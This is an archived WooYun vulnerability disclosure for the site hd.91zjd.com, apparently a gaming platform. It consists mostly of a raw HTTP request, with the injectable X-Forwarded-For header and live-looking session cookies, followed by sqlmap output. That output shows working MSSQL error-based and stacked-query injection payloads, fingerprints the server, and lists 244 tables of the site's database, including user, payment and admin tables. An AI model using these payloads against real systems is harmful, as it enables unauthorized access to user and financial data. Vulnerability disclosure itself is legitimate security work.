乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-03: 细节已通知厂商并且等待厂商处理中 2016-05-09: 厂商已经主动忽略漏洞,细节向公众公开
GET /Manage/Reg.aspx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21X-Forwarded-For: q*X-Requested-With: XMLHttpRequestReferer: http://hd.91zjd.com/Cookie: ASP.NET_SessionId=ibe25ph3xwts1fbihblpyjyf; PHPSESSID=cr8njnjl1mdsglra7j9gmmpd55; HMACCOUNT=E8E753AFF72A1AEA; CNZZDATA4909912=cnzz_eid%3D53645248-1461846717-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1461846717; Hm_lvt_13ddb2b3f776e22091a45a3f47d175d9=1461846714,1461846716; Hm_lpvt_13ddb2b3f776e22091a45a3f47d175d9=1461846716; bdshare_firstime=1461846715790; BAIDUID=3AA905FB43E5A681283C2869CC3F297A:FG=1; BAEID=AEB933863707154BAE91C97D8FD3C417:FG=1Host: hd.91zjd.comConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*
sqlmap resumed the following injection point(s) from stored session:---Parameter: X-Forwarded-For #1* ((custom) HEADER) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: q' AND 9916=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (9916=9916) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(107)+CHAR(113))) AND 'kEJm'='kEJm Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: q';WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: Microsoft SQL Server 2008Database: zjddb[244 tables]+-----------------------------------+| FlashAd || JY_Aisoyo_class || SignInLogs || SignInRule || Sys_ProcErrorCollection || TBankDeposit || TBankSerialRes || TBankSerialResource || TBankWallet || TBattleMatchTable || TBattleRoomInfo || TChangeRecord || TChangeRecordUser || TCharmExchange || TContestInfo || TContestRecord || TContestRecord_New || TContestUserRecord || TFasciChangeRecord || TGMRecord || TGM_OperationRecord || TGameIPRule || TGameKindInfo || TGameLock || TGameNameInfo || TGamePropDefine || TGameRoomBase || TGameRoomInfo || TGameRoomMsg || TGameRoomTable || TGameServerInfo || TLockCode || TLoginRecord || TMatchTable || TMatchTableTest || TMoneyChangeRecord || TMoneyExceptLog || TPropBuyGive || TPropDefine || TReceiveMoneyDefind || TReceiveMoneyRecord || TRoomIPRule || TRoomRecord || TSendMoneyRecord || TSendMoneyRecord_New || TSignUp || TTransferRecord || TUserCallGM || TUserInfo || TUserList || TUserLoginGame || TUserNameRule || TUserProp || TUsers || TWLoginRecord || TZLoginRecord || T_InviteCodeRecord || T_PhoneExchangeSet || T_RewardConfig || T_RewardLog || T_RewardRecord || T_ShareConfig || T_Share_Invite_Log || VChangeRecord || VPropGive || VRoomList || VUserBuy || VUserListReceive || VUserListSend || VUserProp || VUsers || VUsersAlbum || Web_AdminEmail || Web_AdminModifyLog || Web_Agency || Web_AgencyAccountLog || Web_AgencyBalanceLog || Web_AgencyDayReport || Web_AgencyMoneyChangeLog || Web_AgencyPercentChange || Web_AgencyPopeSet || Web_AgencyRMBCost || Web_AlmsConfig || Web_AlmsDrawLog || Web_AnalyData_DateOnline || Web_Analy_DateReport || Web_Analy_MonthReport || Web_Analy_NewUserReport || Web_ApplyVipRoom || Web_Award || Web_AwardClass || Web_AwardLog || Web_BuyClothLog || Web_Card || Web_CharmExchangeLog || Web_ClearFasciPropDefine || Web_ClearFasciPropUseLog || Web_ClearingLog || Web_Clothes || Web_CompanyInfo || Web_Config || Web_ContestRank || Web_Count_AgencyOnline || Web_Count_OnlineUsers || Web_Count_RoomOnline || Web_CreateID || Web_DataAnaly_Users || Web_DataClearLog || Web_DayTaxReport || Web_Exchange || Web_FasciExchangeConfig || Web_FasciExchangeLog || Web_FineryID || Web_FriendLink || Web_GUID || Web_GameGuidList || Web_GameInfo || Web_GameMain || Web_GameType || Web_IndexFlash || Web_Link || Web_Log || Web_LotterAward || Web_LotterConfig || Web_LotterLog || Web_LotterSpecial || Web_LotteriesLog || Web_Manage_Model || Web_Manage_Popedom || Web_MatchAwardConfig || Web_MatchSendType || Web_MobilePayConfig || Web_MobilePayGameType || Web_MoneyChangeLog || Web_MoneyStatEveryday || Web_NewsData || Web_NewsType || Web_PConfig || Web_PVAndIPStat || Web_PlayerDayReport || Web_PointChangeLog || Web_PropChangeLog || Web_RMBCost || Web_RebateInfo || Web_System || Web_TGClearingRecord || Web_TGPayRecord || Web_TaxStatEveryDay || Web_TransLog || Web_TransfersAccount || Web_TuiGuang || Web_TuiGuangLog || Web_UserAlbum || Web_UserAlbumColumn || Web_UserApplyVipRecord || Web_UserModifyLog || Web_Users || Web_VAgencyBalanceLog || Web_VAgency_UserPayList || Web_VAnalyData_DateOnline || Web_VAnaly_AgencyDateReport || Web_VAnaly_DateReport || Web_VAnaly_GameCountAndTax || Web_VAnaly_NewUserPayList || Web_VAnaly_NewUserReport || Web_VAnaly_PayList || Web_VAnaly_UserList24A || Web_VAnaly_UserList24B || Web_VAnaly_UserListReg || Web_VApplyVipRoom || Web_VBankDeposit || Web_VBuyClothLog || Web_VChangeRecord || Web_VCharmExchange || Web_VDataList || Web_VFasciClearPropLog || Web_VFasciExchangeLog || Web_VGameKindList || Web_VGameNameInfo || Web_VGameRoomInfo || Web_VGameRoomInfo2 || Web_VGetAgencyDetail1 || Web_VGetPlayDetail || Web_VGetUserOnline || Web_VLotterLog || Web_VLotterSpecial || Web_VMatchAwardConfig || Web_VMatchLog || Web_VMatchLog_New || Web_VMatchTable || Web_VMoneyChangeRecord || Web_VPropBuyGive || Web_VReceiveMoneyLog || Web_VTContestRoom || Web_VTGLog || Web_VTuiGuang || Web_VUserBattlePoint || Web_VUserGameMoney || Web_VUsersList || Web_ValmsDrawRecord || Web_manage_admin || Web_msg || Web_vAgencyAccountLog || Web_vAgencyAndPlayerSumPoint_List || Web_vAgencyExchange || Web_vAgencyList || Web_vAgencySpareValue || Web_vAgencySpareValueLog || Web_vAwardLog || Web_vAwardRecord || Web_vBankMoneyOpera || Web_vBuyPropLog || Web_vBuyVipLog || Web_vExchangeFasciLog || Web_vFaciSum || Web_vGameRecord || Web_vNewsList || Web_vPlayerSpareValue || Web_vPropTotal || Web_vSendMoneyRecord_New || Web_vTaxStatEveryday || Web_vTransferLog || Web_vUserAlbumColumn || Web_vUserAllMoneyChangeLog || Web_vUserList || Web_vUserLoginList || Web_vUserMoneyRank || Web_vUserPoint || Web_vUserTime || TGM_AwardType || sqlmapoutput || view_EveyMonthAnaly_monthReport || view_PayByAnage || view_PayByAnageAaySuccess || view_getNewsByTOPN || web_AgencyAccount || web_AgencyRebateLog || web_SystemMsg || web_UserMoneyChange || web_VPayTotalRecord || web_VPlayerLoginLog || web_VTGBalanceLog || web_vGetVipLog || web_vTGpayClearing |+-----------------------------------+
危害等级:无影响厂商忽略
忽略时间:2016-05-09 09:00
漏洞Rank:4 (WooYun评价)
暂无